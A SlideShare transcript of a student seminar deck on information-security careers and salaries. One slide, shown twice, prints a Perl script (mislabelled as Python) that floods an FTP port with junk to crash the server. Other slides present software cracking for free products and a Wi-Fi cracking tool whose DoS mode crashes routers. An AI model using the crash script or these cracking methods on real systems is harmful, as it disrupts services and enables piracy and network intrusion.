SlideShare a Scribd company logo

Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd

Download as PPT, PDF
Nipun Jaswal
Nipun Jaswal

Presentation on topics beyond the conventional ethical hacking , discusses job factors and scope in the security field :) this was presented in LPU (Lovely Professional University) as a Seminar with attendees over 200. Meet m e at FB if u want it fb/nipun.jaswal

EducationTechnology
1 of 38
Life Beyond Ethical Hacking “ The Actual Information Security” By :-Nipun Jaswal (CSA , HCF Info sec Pvt. Ltd. )
Acknowledgements Dr. H.S Johal Ms. Himanshi
Lil About My Self  Certified With C|EH , CISE , AFCEH  Associated With over 9 Companies  Ambassador , EC-COUNCIL  Creator Of India’s Fist DLP on Web Application Penetration Testing Course  Student @ LPU   Tested Over 90+ Servers  Currently working as Chief Security Analyst at HCF Infosec Pvt. Ltd
Lets Go Old School ,What is Ethical Hacking?  Breaking Into Devices , Networks Legally.  Securing Servers, Recovering  Emails etc.  But the Question Remains !  Where to get these jobs ?
Jobs And Stats
Why More Jobs and Less People ?  Emerging Technology  Still Register Work  Don’t want to spend money  Find it too difficult  People Feel they can learn hacking in 2 days workshop :-P  No Proper facilities of required courses
Salary Packages  Normal B.tech : 300K-400K  BPO : 100K-250K  DEVELOPMENT : 300K-700K  SECURITY : 600K-1300K
Beyond So Called “Ethical Hacking”  Web Application Penetration testing  Exploit Writing  Reverse Engineering  Malware Analysis  Computer Forensics  Protocol Analysis
Why To Go Beyond Ethical Hacking?  Jobs For Ethical Hacker:-  Trainer  Trainer  Trainer  Trainer  And Trainer  Salary Around : 15K + Incentives
Jobs Beyond Ethical Hacking:-  Jobs For Hackers:-  Researchers  Technical Heads  Penetration testers  Forensic Investigators  Salary Around: 300-400K Per  Month 
Benefits  of not Being a Hacker
Benefits  of Being a Hacker I M UR WORST NIGHTMARE :-P
How To Let Your Dreams Come True?  Some Highly Paid Fields :-  WAPT – Involves Testing of Web Applications , Websites , Servers , Source code Auditing .  Exploit Writing – Finding Vulnerabilities in soft wares and Possibly to Exploit the Software .  Reverse Engineering :- Software cracking , Patches , Modifying Features of an end product
How To Let Your Dreams Come True?  Some Highly Paid Fields :-  Wireless Testing :- Involves Network Security infrastructure build up , Managing Networks , System Administration etc.  Projects :- Good At Coding? Show to the whole world .  Forensics : Highest Paid Job in the entire list  Takes A lot , And Pays A lot
Why We Need More People ? Source: Indian Express
Why We Need More People ? Source: Times Of India
Host Gator Hacked !! 3 Lac Websites Owned By Hackers Source: SoftPedia
Host Gator Hacked !! 3 Lac Websites Owned By Hackers Contd.. Source: Private
Norton India Hacked !! Source: Private
Norton India’s Database Hacked !! Source: Private
Norton India’s Database Hacked !! Source: Private
The Biggest Of All… Anonymous!! Source: National Post
Now Beyond The Word ‘Ethical’ Web Application Penetration Testing :- • Find Bugs In Web Applications – Custom Made , Open Source Applications . • Bugs which may compromise the security , make it vulnerable , helps an attacker to steal sensitive information • Now How To Perform 1 Out of 300 Tests In Web Applications Pen- Test? • Lets See a Simple Example – SQL Injection Bypass
Rise Of The Web Applications
Fasten Your Seat Belts , Its Showtime DEMO
Now Beyond The Word ‘Ethical’ Exploit Writing • Potentially writing codes to exploit a vulnerability . • Highly Paid in Soft wares are vulnerable to Exploits , which further may lead to compromise of the entire system. • Requirement : C,C++, Perl , Python , Ruby , Assembly language
Now Beyond The Word ‘Ethical’ Simplest of The Exploit in Python- Crashing A Secure Port FTP Server use strict; use Socket; my $junk = "x41" x1000; my $host = shift || ‘192.168.15.1'; my $port = shift || 200; my $proto = getprotobyname('tcp'); my $iaddr = inet_aton($host); my $paddr = sockaddr_in($port, $iaddr); print "[+] Setting up socketn"; socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!"; print "[+] Connecting to $host on port $portn"; connect(SOCKET, $paddr) or die "connect: $!"; print "[+] Sending payloadn"; print SOCKET $junk."n"; print "[+] Payload sentn"; close SOCKET or die "close: $!";
Now Beyond The Word ‘Ethical’ Simplest of The Exploit in Python- Crashing A Secure Port FTP Server use strict; use Socket; my $junk = "x41" x1000; my $host = shift || ‘192.168.15.1'; my $port = shift || 200; my $proto = getprotobyname('tcp'); my $iaddr = inet_aton($host); my $paddr = sockaddr_in($port, $iaddr); print "[+] Setting up socketn"; socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!"; print "[+] Connecting to $host on port $portn"; connect(SOCKET, $paddr) or die "connect: $!"; print "[+] Sending payloadn"; print SOCKET $junk."n"; print "[+] Payload sentn"; close SOCKET or die "close: $!";
Now Beyond The Word ‘Ethical’ Prices for Various Exploits
Now Beyond The Word ‘Ethical’ Reverse Engineering • Editing the final software to find serials keys , stop the online authentications , • Mostly used by pirates • Sometimes used to edit the features of a final software • Make your Life easier with free products 
Now Beyond The Word ‘Ethical’ Wireless Penetration Testing • Involves Auditing of Network Security Over Wireless • Installation of Servers And Security Devices • Crack proofing Wireless Passwords • Highly paid • Requires Networking Background
INSANITY WIFI CRACKER Insanity Wi-fi Cracker • Developed By me and my Friends for minor project • Automates the cracking of various wifi securities • Performs self MITM attack • DOS Service Can Crash the Routers For Ever :-P • Even an 8 Years old can press the button ‘c’ for cracking and no. for a particular AP to crack
Wi-fi Cracking At a Click Of a Button DEMO
So A One Last Question , Wanna go this ?
Or Wanna Go This ?
After All It’s your Career |Handle it with care|
Any Questions ?
Contact Email : info@nipunjaswal.com www.nipunjaswal.com www.facebook.com/nipun.jaswal www.hatcon.in www.hcf.co.in www.starthack.com www.cyber-rog.com/h3ll www.pentest.co.in

Recommended

Basics of Meterpreter Evasion
Basics of Meterpreter EvasionBasics of Meterpreter Evasion
Basics of Meterpreter EvasionNipun Jaswal
 
Ground Zero Training- Metasploit For Web
Ground Zero Training- Metasploit For WebGround Zero Training- Metasploit For Web
Ground Zero Training- Metasploit For WebNipun Jaswal
 
Hijacking Softwares for fun and profit
Hijacking Softwares for fun and profitHijacking Softwares for fun and profit
Hijacking Softwares for fun and profitNipun Jaswal
 
Android Application Penetration Testing - Mohammed Adam
Android Application Penetration Testing - Mohammed AdamAndroid Application Penetration Testing - Mohammed Adam
Android Application Penetration Testing - Mohammed AdamMohammed Adam
 
Understanding The Known: OWASP A9 Using Components With Known Vulnerabilities
Understanding The Known: OWASP A9 Using Components With Known VulnerabilitiesUnderstanding The Known: OWASP A9 Using Components With Known Vulnerabilities
Understanding The Known: OWASP A9 Using Components With Known VulnerabilitiesAnant Shrivastava
 
When the internet bleeded : RootConf 2014
When the internet bleeded : RootConf 2014When the internet bleeded : RootConf 2014
When the internet bleeded : RootConf 2014Anant Shrivastava
 
[OWASP Poland Day] OWASP for testing mobile applications
[OWASP Poland Day] OWASP for testing mobile applications[OWASP Poland Day] OWASP for testing mobile applications
[OWASP Poland Day] OWASP for testing mobile applicationsOWASP
 
Android security and penetration testing | DIVA | Yogesh Ojha
Android security and penetration testing | DIVA | Yogesh OjhaAndroid security and penetration testing | DIVA | Yogesh Ojha
Android security and penetration testing | DIVA | Yogesh OjhaYogesh Ojha
 

Recommended

Basics of Meterpreter Evasion
Basics of Meterpreter EvasionBasics of Meterpreter Evasion
Basics of Meterpreter EvasionNipun Jaswal
 
Ground Zero Training- Metasploit For Web
Ground Zero Training- Metasploit For WebGround Zero Training- Metasploit For Web
Ground Zero Training- Metasploit For WebNipun Jaswal
 
Hijacking Softwares for fun and profit
Hijacking Softwares for fun and profitHijacking Softwares for fun and profit
Hijacking Softwares for fun and profitNipun Jaswal
 
Android Application Penetration Testing - Mohammed Adam
Android Application Penetration Testing - Mohammed AdamAndroid Application Penetration Testing - Mohammed Adam
Android Application Penetration Testing - Mohammed AdamMohammed Adam
 
Understanding The Known: OWASP A9 Using Components With Known Vulnerabilities
Understanding The Known: OWASP A9 Using Components With Known VulnerabilitiesUnderstanding The Known: OWASP A9 Using Components With Known Vulnerabilities
Understanding The Known: OWASP A9 Using Components With Known VulnerabilitiesAnant Shrivastava
 
When the internet bleeded : RootConf 2014
When the internet bleeded : RootConf 2014When the internet bleeded : RootConf 2014
When the internet bleeded : RootConf 2014Anant Shrivastava
 
[OWASP Poland Day] OWASP for testing mobile applications
[OWASP Poland Day] OWASP for testing mobile applications[OWASP Poland Day] OWASP for testing mobile applications
[OWASP Poland Day] OWASP for testing mobile applicationsOWASP
 
Android security and penetration testing | DIVA | Yogesh Ojha
Android security and penetration testing | DIVA | Yogesh OjhaAndroid security and penetration testing | DIVA | Yogesh Ojha
Android security and penetration testing | DIVA | Yogesh OjhaYogesh Ojha
 
Cyber Security and Open Source
Cyber Security and Open SourceCyber Security and Open Source
Cyber Security and Open SourcePOSSCON
 
Elizabeth Lawler - Devops, security, and compliance working in unison
Elizabeth Lawler - Devops, security, and compliance working in unisonElizabeth Lawler - Devops, security, and compliance working in unison
Elizabeth Lawler - Devops, security, and compliance working in unisonDevSecCon
 
Basics of getting Into Bug Bounty Hunting
Basics of getting Into Bug Bounty HuntingBasics of getting Into Bug Bounty Hunting
Basics of getting Into Bug Bounty HuntingMuhammad Khizer Javed
 
Owasp Mobile Top 10 - M7 & M8
Owasp Mobile Top 10 - M7 & M8Owasp Mobile Top 10 - M7 & M8
Owasp Mobile Top 10 - M7 & M85h1vang
 
WiFi security
WiFi security WiFi security
WiFi security Ihor Uzhvenko
 
Your internet-exposure-that-makes-you-vulnerable
Your internet-exposure-that-makes-you-vulnerableYour internet-exposure-that-makes-you-vulnerable
Your internet-exposure-that-makes-you-vulnerableIIMBNSRCEL
 
Canberk Bolat - Alice Android Diyarında
Canberk Bolat - Alice Android DiyarındaCanberk Bolat - Alice Android Diyarında
Canberk Bolat - Alice Android DiyarındaCypSec - Siber Güvenlik Konferansı
 
How to-become-secure-and-stay-secure
How to-become-secure-and-stay-secureHow to-become-secure-and-stay-secure
How to-become-secure-and-stay-secureIIMBNSRCEL
 
Android Hacking + Pentesting
Android Hacking + Pentesting Android Hacking + Pentesting
Android Hacking + Pentesting Sina Manavi
 
Web Application Security - DevFest + GDay George Town 2016
Web Application Security - DevFest + GDay George Town 2016Web Application Security - DevFest + GDay George Town 2016
Web Application Security - DevFest + GDay George Town 2016Gareth Davies
 
LKNOG3 - Bug Bounty
LKNOG3 - Bug BountyLKNOG3 - Bug Bounty
LKNOG3 - Bug BountyLKNOG
 
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin Ahmed
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin AhmedBackup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin Ahmed
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin AhmedMazin Ahmed
 
Security by Weston Hecker
Security by Weston HeckerSecurity by Weston Hecker
Security by Weston HeckerEC-Council
 
So Your Company Hired A Pentester
So Your Company Hired A PentesterSo Your Company Hired A Pentester
So Your Company Hired A PentesterNorthBayWeb
 
Owasp mobile top 10
Owasp mobile top 10Owasp mobile top 10
Owasp mobile top 10Pawel Rzepa
 
VULNERABILITY ( CYBER SECURITY )
VULNERABILITY ( CYBER SECURITY )VULNERABILITY ( CYBER SECURITY )
VULNERABILITY ( CYBER SECURITY )Kashyap Mandaliya
 
Where To Start When Your Environment is Fucked
Where To Start When Your Environment is FuckedWhere To Start When Your Environment is Fucked
Where To Start When Your Environment is FuckedAmanda Berlin
 
Protecting your online identity - Managing your passwords
Protecting your online identity - Managing your passwordsProtecting your online identity - Managing your passwords
Protecting your online identity - Managing your passwordsBunmi Sowande
 
Threat detection with 0 cost
Threat detection with 0 costThreat detection with 0 cost
Threat detection with 0 costSecurity Bootcamp
 
Hacking Web Apps by Brent White
Hacking Web Apps by Brent WhiteHacking Web Apps by Brent White
Hacking Web Apps by Brent WhiteEC-Council
 
How to hack or what is ethical hacking
How to hack or what is ethical hackingHow to hack or what is ethical hacking
How to hack or what is ethical hackingbaabtra.com - No. 1 supplier of quality freshers
 
Web Application Security with PHP
Web Application Security with PHPWeb Application Security with PHP
Web Application Security with PHPjikbal
 

More Related Content

What's hot

Cyber Security and Open Source
Cyber Security and Open SourceCyber Security and Open Source
Cyber Security and Open SourcePOSSCON
 
Elizabeth Lawler - Devops, security, and compliance working in unison
Elizabeth Lawler - Devops, security, and compliance working in unisonElizabeth Lawler - Devops, security, and compliance working in unison
Elizabeth Lawler - Devops, security, and compliance working in unisonDevSecCon
 
Basics of getting Into Bug Bounty Hunting
Basics of getting Into Bug Bounty HuntingBasics of getting Into Bug Bounty Hunting
Basics of getting Into Bug Bounty HuntingMuhammad Khizer Javed
 
Owasp Mobile Top 10 - M7 & M8
Owasp Mobile Top 10 - M7 & M8Owasp Mobile Top 10 - M7 & M8
Owasp Mobile Top 10 - M7 & M85h1vang
 
Your internet-exposure-that-makes-you-vulnerable
Your internet-exposure-that-makes-you-vulnerableYour internet-exposure-that-makes-you-vulnerable
Your internet-exposure-that-makes-you-vulnerableIIMBNSRCEL
 
How to-become-secure-and-stay-secure
How to-become-secure-and-stay-secureHow to-become-secure-and-stay-secure
How to-become-secure-and-stay-secureIIMBNSRCEL
 
Android Hacking + Pentesting
Android Hacking + Pentesting Android Hacking + Pentesting
Android Hacking + Pentesting Sina Manavi
 
Web Application Security - DevFest + GDay George Town 2016
Web Application Security - DevFest + GDay George Town 2016Web Application Security - DevFest + GDay George Town 2016
Web Application Security - DevFest + GDay George Town 2016Gareth Davies
 
LKNOG3 - Bug Bounty
LKNOG3 - Bug BountyLKNOG3 - Bug Bounty
LKNOG3 - Bug BountyLKNOG
 
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin Ahmed
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin AhmedBackup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin Ahmed
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin AhmedMazin Ahmed
 
Security by Weston Hecker
Security by Weston HeckerSecurity by Weston Hecker
Security by Weston HeckerEC-Council
 
So Your Company Hired A Pentester
So Your Company Hired A PentesterSo Your Company Hired A Pentester
So Your Company Hired A PentesterNorthBayWeb
 
Owasp mobile top 10
Owasp mobile top 10Owasp mobile top 10
Owasp mobile top 10Pawel Rzepa
 
VULNERABILITY ( CYBER SECURITY )
VULNERABILITY ( CYBER SECURITY )VULNERABILITY ( CYBER SECURITY )
VULNERABILITY ( CYBER SECURITY )Kashyap Mandaliya
 
Where To Start When Your Environment is Fucked
Where To Start When Your Environment is FuckedWhere To Start When Your Environment is Fucked
Where To Start When Your Environment is FuckedAmanda Berlin
 
Protecting your online identity - Managing your passwords
Protecting your online identity - Managing your passwordsProtecting your online identity - Managing your passwords
Protecting your online identity - Managing your passwordsBunmi Sowande
 
Threat detection with 0 cost
Threat detection with 0 costThreat detection with 0 cost
Threat detection with 0 costSecurity Bootcamp
 
Hacking Web Apps by Brent White
Hacking Web Apps by Brent WhiteHacking Web Apps by Brent White
Hacking Web Apps by Brent WhiteEC-Council
 

What's hot (20)

Cyber Security and Open Source
Cyber Security and Open SourceCyber Security and Open Source
Cyber Security and Open Source
 
Elizabeth Lawler - Devops, security, and compliance working in unison
Elizabeth Lawler - Devops, security, and compliance working in unisonElizabeth Lawler - Devops, security, and compliance working in unison
Elizabeth Lawler - Devops, security, and compliance working in unison
 
Basics of getting Into Bug Bounty Hunting
Basics of getting Into Bug Bounty HuntingBasics of getting Into Bug Bounty Hunting
Basics of getting Into Bug Bounty Hunting
 
Owasp Mobile Top 10 - M7 & M8
Owasp Mobile Top 10 - M7 & M8Owasp Mobile Top 10 - M7 & M8
Owasp Mobile Top 10 - M7 & M8
 
WiFi security
WiFi security WiFi security
WiFi security
 
Your internet-exposure-that-makes-you-vulnerable
Your internet-exposure-that-makes-you-vulnerableYour internet-exposure-that-makes-you-vulnerable
Your internet-exposure-that-makes-you-vulnerable
 
Canberk Bolat - Alice Android Diyarında
Canberk Bolat - Alice Android DiyarındaCanberk Bolat - Alice Android Diyarında
Canberk Bolat - Alice Android Diyarında
 
How to-become-secure-and-stay-secure
How to-become-secure-and-stay-secureHow to-become-secure-and-stay-secure
How to-become-secure-and-stay-secure
 
Android Hacking + Pentesting
Android Hacking + Pentesting Android Hacking + Pentesting
Android Hacking + Pentesting
 
Web Application Security - DevFest + GDay George Town 2016
Web Application Security - DevFest + GDay George Town 2016Web Application Security - DevFest + GDay George Town 2016
Web Application Security - DevFest + GDay George Town 2016
 
LKNOG3 - Bug Bounty
LKNOG3 - Bug BountyLKNOG3 - Bug Bounty
LKNOG3 - Bug Bounty
 
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin Ahmed
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin AhmedBackup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin Ahmed
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin Ahmed
 
Security by Weston Hecker
Security by Weston HeckerSecurity by Weston Hecker
Security by Weston Hecker
 
So Your Company Hired A Pentester
So Your Company Hired A PentesterSo Your Company Hired A Pentester
So Your Company Hired A Pentester
 
Owasp mobile top 10
Owasp mobile top 10Owasp mobile top 10
Owasp mobile top 10
 
VULNERABILITY ( CYBER SECURITY )
VULNERABILITY ( CYBER SECURITY )VULNERABILITY ( CYBER SECURITY )
VULNERABILITY ( CYBER SECURITY )
 
Where To Start When Your Environment is Fucked
Where To Start When Your Environment is FuckedWhere To Start When Your Environment is Fucked
Where To Start When Your Environment is Fucked
 
Protecting your online identity - Managing your passwords
Protecting your online identity - Managing your passwordsProtecting your online identity - Managing your passwords
Protecting your online identity - Managing your passwords
 
Threat detection with 0 cost
Threat detection with 0 costThreat detection with 0 cost
Threat detection with 0 cost
 
Hacking Web Apps by Brent White
Hacking Web Apps by Brent WhiteHacking Web Apps by Brent White
Hacking Web Apps by Brent White
 

Similar to Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd

Web Application Security with PHP
Web Application Security with PHPWeb Application Security with PHP
Web Application Security with PHPjikbal
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Rob Fuller
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Chris Gates
 
Abusing bleeding edge web standards for appsec glory
Abusing bleeding edge web standards for appsec gloryAbusing bleeding edge web standards for appsec glory
Abusing bleeding edge web standards for appsec gloryPriyanka Aash
 
The hardcore stuff i hack, experiences from past VAPT assignments
The hardcore stuff i hack, experiences from past VAPT assignmentsThe hardcore stuff i hack, experiences from past VAPT assignments
The hardcore stuff i hack, experiences from past VAPT assignmentsn|u - The Open Security Community
 
How to get along with HATEOAS without letting the bad guys steal your lunch -...
How to get along with HATEOAS without letting the bad guys steal your lunch -...How to get along with HATEOAS without letting the bad guys steal your lunch -...
How to get along with HATEOAS without letting the bad guys steal your lunch -...YK Chang
 
Zen and the art of Security Testing
Zen and the art of Security TestingZen and the art of Security Testing
Zen and the art of Security TestingTEST Huddle
 
Attacks on the cyber world
Attacks on the cyber worldAttacks on the cyber world
Attacks on the cyber worldNikhil Tripathi
 
Make Every Spin Count: Putting the Security Odds in Your Favor
Make Every Spin Count: Putting the Security Odds in Your FavorMake Every Spin Count: Putting the Security Odds in Your Favor
Make Every Spin Count: Putting the Security Odds in Your FavorDavid Perkins
 
BlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deceptionBlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deceptionBlueHat Security Conference
 
Creating Havoc using Human Interface Device
Creating Havoc using Human Interface DeviceCreating Havoc using Human Interface Device
Creating Havoc using Human Interface DevicePositive Hack Days
 
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2Chris Gates
 
The Internet of Fails - Mark Stanislav, Senior Security Consultant, Rapid7
The Internet of Fails - Mark Stanislav, Senior Security Consultant, Rapid7The Internet of Fails - Mark Stanislav, Senior Security Consultant, Rapid7
The Internet of Fails - Mark Stanislav, Senior Security Consultant, Rapid7Rapid7
 
Python-Assisted Red-Teaming Operation
Python-Assisted Red-Teaming OperationPython-Assisted Red-Teaming Operation
Python-Assisted Red-Teaming OperationSatria Ady Pradana
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecuritiesamiable_indian
 
Andrews whitakrer lecture18-security.ppt
Andrews whitakrer lecture18-security.pptAndrews whitakrer lecture18-security.ppt
Andrews whitakrer lecture18-security.pptSilverGold16
 

Similar to Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd (20)

How to hack or what is ethical hacking
How to hack or what is ethical hackingHow to hack or what is ethical hacking
How to hack or what is ethical hacking
 
Web Application Security with PHP
Web Application Security with PHPWeb Application Security with PHP
Web Application Security with PHP
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
 
Abusing bleeding edge web standards for appsec glory
Abusing bleeding edge web standards for appsec gloryAbusing bleeding edge web standards for appsec glory
Abusing bleeding edge web standards for appsec glory
 
The hardcore stuff i hack, experiences from past VAPT assignments
The hardcore stuff i hack, experiences from past VAPT assignmentsThe hardcore stuff i hack, experiences from past VAPT assignments
The hardcore stuff i hack, experiences from past VAPT assignments
 
How to get along with HATEOAS without letting the bad guys steal your lunch -...
How to get along with HATEOAS without letting the bad guys steal your lunch -...How to get along with HATEOAS without letting the bad guys steal your lunch -...
How to get along with HATEOAS without letting the bad guys steal your lunch -...
 
Zen and the art of Security Testing
Zen and the art of Security TestingZen and the art of Security Testing
Zen and the art of Security Testing
 
Attacks on the cyber world
Attacks on the cyber worldAttacks on the cyber world
Attacks on the cyber world
 
Make Every Spin Count: Putting the Security Odds in Your Favor
Make Every Spin Count: Putting the Security Odds in Your FavorMake Every Spin Count: Putting the Security Odds in Your Favor
Make Every Spin Count: Putting the Security Odds in Your Favor
 
black hat deephish
black hat deephishblack hat deephish
black hat deephish
 
BlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deceptionBlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deception
 
Creating Havoc using Human Interface Device
Creating Havoc using Human Interface DeviceCreating Havoc using Human Interface Device
Creating Havoc using Human Interface Device
 
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
 
Ntxissacsc5 red 1 & 2 basic hacking tools ncc group
Ntxissacsc5 red 1 & 2 basic hacking tools ncc groupNtxissacsc5 red 1 & 2 basic hacking tools ncc group
Ntxissacsc5 red 1 & 2 basic hacking tools ncc group
 
The Internet of Fails - Mark Stanislav, Senior Security Consultant, Rapid7
The Internet of Fails - Mark Stanislav, Senior Security Consultant, Rapid7The Internet of Fails - Mark Stanislav, Senior Security Consultant, Rapid7
The Internet of Fails - Mark Stanislav, Senior Security Consultant, Rapid7
 
Starwest 2008
Starwest 2008Starwest 2008
Starwest 2008
 
Python-Assisted Red-Teaming Operation
Python-Assisted Red-Teaming OperationPython-Assisted Red-Teaming Operation
Python-Assisted Red-Teaming Operation
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecurities
 
Andrews whitakrer lecture18-security.ppt
Andrews whitakrer lecture18-security.pptAndrews whitakrer lecture18-security.ppt
Andrews whitakrer lecture18-security.ppt
 

Recently uploaded

Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...
Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...
Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...ZurliaSoop
 
SKILL OF INTRODUCING THE LESSON MICRO SKILLS.pptx
SKILL OF INTRODUCING THE LESSON MICRO SKILLS.pptxSKILL OF INTRODUCING THE LESSON MICRO SKILLS.pptx
SKILL OF INTRODUCING THE LESSON MICRO SKILLS.pptxAmanpreet Kaur
 
Unit-IV; Professional Sales Representative (PSR).pptx
Unit-IV; Professional Sales Representative (PSR).pptxUnit-IV; Professional Sales Representative (PSR).pptx
Unit-IV; Professional Sales Representative (PSR).pptxVishalSingh1417
 
Introduction to Nonprofit Accounting: The Basics
Introduction to Nonprofit Accounting: The BasicsIntroduction to Nonprofit Accounting: The Basics
Introduction to Nonprofit Accounting: The BasicsTechSoup
 
Understanding Accommodations and Modifications
Understanding Accommodations and ModificationsUnderstanding Accommodations and Modifications
Understanding Accommodations and ModificationsMJDuyan
 
ICT role in 21st century education and it's challenges.
ICT role in 21st century education and it's challenges.ICT role in 21st century education and it's challenges.
ICT role in 21st century education and it's challenges.MaryamAhmad92
 
On National Teacher Day, meet the 2024-25 Kenan Fellows
On National Teacher Day, meet the 2024-25 Kenan FellowsOn National Teacher Day, meet the 2024-25 Kenan Fellows
On National Teacher Day, meet the 2024-25 Kenan FellowsMebane Rash
 
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...Nguyen Thanh Tu Collection
 
Basic Civil Engineering first year Notes- Chapter 4 Building.pptx
Basic Civil Engineering first year Notes- Chapter 4 Building.pptxBasic Civil Engineering first year Notes- Chapter 4 Building.pptx
Basic Civil Engineering first year Notes- Chapter 4 Building.pptxDenish Jangid
 
2024-NATIONAL-LEARNING-CAMP-AND-OTHER.pptx
2024-NATIONAL-LEARNING-CAMP-AND-OTHER.pptx2024-NATIONAL-LEARNING-CAMP-AND-OTHER.pptx
2024-NATIONAL-LEARNING-CAMP-AND-OTHER.pptxMaritesTamaniVerdade
 
General Principles of Intellectual Property: Concepts of Intellectual Proper...
General Principles of Intellectual Property: Concepts of Intellectual Proper...General Principles of Intellectual Property: Concepts of Intellectual Proper...
General Principles of Intellectual Property: Concepts of Intellectual Proper...Poonam Aher Patil
 
1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdfQucHHunhnh
 
psychiatric nursing HISTORY COLLECTION .docx
psychiatric nursing HISTORY COLLECTION .docxpsychiatric nursing HISTORY COLLECTION .docx
psychiatric nursing HISTORY COLLECTION .docxPoojaSen20
 
PROCESS RECORDING FORMAT.docx
PROCESS RECORDING FORMAT.docxPROCESS RECORDING FORMAT.docx
PROCESS RECORDING FORMAT.docxPoojaSen20
 
microwave assisted reaction. General introduction
microwave assisted reaction. General introductionmicrowave assisted reaction. General introduction
microwave assisted reaction. General introductionMaksud Ahmed
 
Accessible Digital Futures project (20/03/2024)
Accessible Digital Futures project (20/03/2024)Accessible Digital Futures project (20/03/2024)
Accessible Digital Futures project (20/03/2024)Jisc
 
Food safety_Challenges food safety laboratories_.pdf
Food safety_Challenges food safety laboratories_.pdfFood safety_Challenges food safety laboratories_.pdf
Food safety_Challenges food safety laboratories_.pdfSherif Taha
 

Recently uploaded (20)

Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...
Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...
Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...
 
SKILL OF INTRODUCING THE LESSON MICRO SKILLS.pptx
SKILL OF INTRODUCING THE LESSON MICRO SKILLS.pptxSKILL OF INTRODUCING THE LESSON MICRO SKILLS.pptx
SKILL OF INTRODUCING THE LESSON MICRO SKILLS.pptx
 
Mehran University Newsletter Vol-X, Issue-I, 2024
Mehran University Newsletter Vol-X, Issue-I, 2024Mehran University Newsletter Vol-X, Issue-I, 2024
Mehran University Newsletter Vol-X, Issue-I, 2024
 
Unit-IV; Professional Sales Representative (PSR).pptx
Unit-IV; Professional Sales Representative (PSR).pptxUnit-IV; Professional Sales Representative (PSR).pptx
